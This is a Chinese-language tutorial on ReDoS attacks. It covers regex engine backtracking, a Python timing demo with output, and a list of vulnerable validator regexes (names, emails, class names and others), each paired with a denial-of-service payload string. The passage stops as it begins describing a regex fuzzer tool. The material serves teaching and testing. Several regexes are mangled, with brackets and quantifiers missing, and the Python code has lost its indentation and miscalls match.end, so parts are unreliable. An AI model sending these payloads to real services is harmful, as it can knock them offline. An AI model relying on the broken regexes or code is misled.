ReDOS攻击

一、正则表达式引擎

1.DFA:速度快、特性少,(mysql)
2.NFA:速度慢、特性多,(大多数语言:python、java、php、ruby、.net、perl)

引擎区别语言匹配方式
DFA速度快、特性少mysql等拿文本去比较正则
NFA速度慢、特性多python、java、php、ruby、.net、perl等拿正则去比较文本

二、NFA的匹配流程与回溯

2.1匹配流程

reg:"lingwu"
text:"this is lingwu's blog"

以reg的“lingwu”为基准,从“l”开始和text文本进行匹配,一直到第8个字符“l”时才匹配成功,接着用第二个字符“i”进行匹配,以此类推,直到最后一个字符“u”。

2.2回溯

reg:"lingwu2"
text:"this is lingwu's blog"

前面过程不变,当reg用最后一个字符“2”和文本进行匹配的时候,由于text中lingwu后面没有匹配到2,此时发生回溯。重新用reg中第一个字符“l”与text中第9个字符“i”进行匹配,后面流程与之前一样。
可通过正则在线debug进行查看匹配过程 https://regex101.com

三、ReDos

以正则为”^(a+)+$”,文本为”aaaaaax”为例,发现随着a的数量增加,正则执行的步骤越来越多,所需的时间也越来越多。

#!/usr/bin/env python
import re
import time
import sys
regex = r"^(a+)+$"
maketeststring = lambda n: "a" * n +"X"
maxiter = 50
maxtime = 2
# Main function
def main():
print "Python Regular Expression DoS demo"
print "Platfrom: %s %s" % (sys.platform, sys.version)
print "Regular expression %s" % (regex)
print "Typical test string: %s" % (maketeststring(10))
print "Max. itertations: %d" % (maxiter)
print "Max. match time: %d sec%s" % (maxtime, "s" if maxtime != 1 else "")
print
cregex = re.compile(regex)
for i in xrange(1, maxiter):
time = runtest(cregex, i)
if time > maxtime:
   break
return
# Run one test
def runtest(regex, n):
teststr = maketeststring(n)
starttime = time.clock()
match = regex.match(teststr)
elapsetime = int((time.clock() - starttime) * 1000)
count = 0
if match != None:
count = match.end - match.start
print "For  n = %d, match time = %d msec%s, match count = %s" % (n, elapsetime, "s" if elapsetime == 1 else "", count)
return float(elapsetime) / 1000
if __name__ == "__main__":
main()

执行结果如下:

For  n = 20, match time = 60 msec, match count = 0
For  n = 21, match time = 113 msec, match count = 0
For  n = 22, match time = 240 msec, match count = 0
For  n = 23, match time = 481 msec, match count = 0
For  n = 24, match time = 995 msec, match count = 0
For  n = 25, match time = 1944 msec, match count = 0
For  n = 26, match time = 3853 msec, match count = 0

以下为存在问题的正则:

  • 英文的个人名字:
    • Regex: ^[a-zA-Z]+(([',.-][a-zA-Z ])?[a-zA-Z])$
    • Payload: aaaaaaaaaaaaaaaaaaaaaaaaaaaa!
  • Java Classname
    • Regex: ^(([a-z])+.)+A-Z+$
    • Payload: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
  • Email格式验证
    • Regex: ^(0-9a-zA-Z@(([0-9a-zA-Z])+([-\w][0-9a-zA-Z])*.)+[a-zA-Z]{2,9})$
    • Payload: a@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
  • 多个邮箱地址验证
    • Regex: ^[a-zA-Z]+(([',.-][a-zA-Z ])?[a-zA-Z])\s+<(\w[-._\w]\w@\w[-._\w]\w.\w{2,3})>$|^(\w[-._\w]\w@\w[-._\w]\w.\w{2,3})$
    • Payload: aaaaaaaaaaaaaaaaaaaaaaaa!
  • 复数验证
    • Regex: ^\d[0-9](|.\d[0-9]|)*$
    • Payload: 1111111111111111111111111!
  • 模式匹配
    • Regex: ^([a-z0-9]+([-a-z0-9][a-z0-9]+)?.){0,}([a-z0-9]+([-a-z0-9][a-z0-9]+)?){1,63}(.[a-z0-9]{2,7})+$
    • Payload: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
  • DataVault:
    • Regex: ^[(,.)]$
    • Payload: [,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
  • WinFormsAdvanced:
    • Regex: \A([A-Z,a-z]\s?[0-9][A-Z,a-z])\Z
    • Payload: aaaaaaaaaaaaaaaaaa!
  • EntLib:
    • Regex: ^([^"]+)(?:\([^"]+))*$
    • Payload: \\\\\\\\\\\\\\\\“

发现有以下规律:

  • 使用重复分组构造
  • 在重复组内会出现
    • 重复
    • 交替重叠

简单表达出来为下几种情况:

(a+)+
([a-zA-Z]+)*
(a|aa)+
(a|a?)+
(.*a){x} for x > 10

四、工具篇

微软早些发步了一个regex fuzzer的工具,极大的方便了安全人员的测试。用起来也很简单: